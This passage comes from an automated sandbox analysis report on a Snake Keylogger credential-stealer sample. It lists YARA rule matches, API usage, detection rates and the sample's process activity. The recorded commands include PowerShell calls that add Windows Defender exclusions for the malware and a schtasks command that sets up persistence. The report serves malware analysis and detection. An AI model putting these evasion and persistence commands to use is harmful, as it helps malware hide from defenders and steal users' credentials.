                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BCD2814_2_030BCD28
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BEC1814_2_030BEC18
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BF7F114_2_030BF7F1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B3AA114_2_030B3AA1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B39EE14_2_030B39EE
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B29EC14_2_030B29EC
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B3E0914_2_030B3E09
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BEC0A14_2_030BEC0A
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BFC4914_2_030BFC49
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA9FF814_2_06DA9FF8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA1C5814_2_06DA1C58
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA2A9814_2_06DA2A98
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA23B014_2_06DA23B0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA53B014_2_06DA53B0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA98D014_2_06DA98D0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAEE9014_2_06DAEE90
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAEE8014_2_06DAEE80
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA96B014_2_06DA96B0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA9F9114_2_06DA9F91
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAF74014_2_06DAF740
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA8F1914_2_06DA8F19
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAF73014_2_06DAF730
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA8F2814_2_06DA8F28
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAD48014_2_06DAD480
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA1C4914_2_06DA1C49
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAE5D114_2_06DAE5D1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAE5E014_2_06DAE5E0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DADD3014_2_06DADD30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DADD2114_2_06DADD21
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAF2D914_2_06DAF2D9
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAF2E814_2_06DAF2E8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAEA3814_2_06DAEA38
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAEA2814_2_06DAEA28
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAFB9814_2_06DAFB98
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAFB8914_2_06DAFB89
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA53A014_2_06DA53A0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA23A414_2_06DA23A4
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA0B3014_2_06DA0B30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA0B2014_2_06DA0B20
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAD8D814_2_06DAD8D8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAD8C814_2_06DAD8C8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA004014_2_06DA0040
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAD01714_2_06DAD017
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DA000714_2_06DA0007
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAD02814_2_06DAD028
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAE18814_2_06DAE188
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_06DAE18714_2_06DAE187
                Source: OtldpQxzAw.exe, 00000000.00000002.898859461.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000003ED2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exe, 00000000.00000002.909489590.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exe, 00000000.00000002.901255150.00000000028EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exe, 00000000.00000000.836329494.00000000001E0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRufU.exeB vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exe, 00000009.00000002.3302554896.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exeBinary or memory string: OriginalFilenameRufU.exeB vs OtldpQxzAw.exe
                Source: OtldpQxzAw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: OtldpQxzAw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wiSeRRwvZHTk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, z--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, z--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, ioCwaGfdruCHidE4Gk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, ioCwaGfdruCHidE4Gk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, ioCwaGfdruCHidE4Gk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, ioCwaGfdruCHidE4Gk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, ioCwaGfdruCHidE4Gk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, ioCwaGfdruCHidE4Gk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/20@3/4
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMutant created: \Sessions\1\BaseNamedObjects\kQKfpoSPvmfDbvhxHl
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile created: C:\Users\user\AppData\Local\Temp\tmp53CF.tmpJump to behavior
                Source: OtldpQxzAw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: OtldpQxzAw.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000334B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000338E000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003369000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000339B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000335B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OtldpQxzAw.exeVirustotal: Detection: 76%
                Source: OtldpQxzAw.exeReversingLabs: Detection: 73%
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile read: C:\Users\user\Desktop\OtldpQxzAw.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"
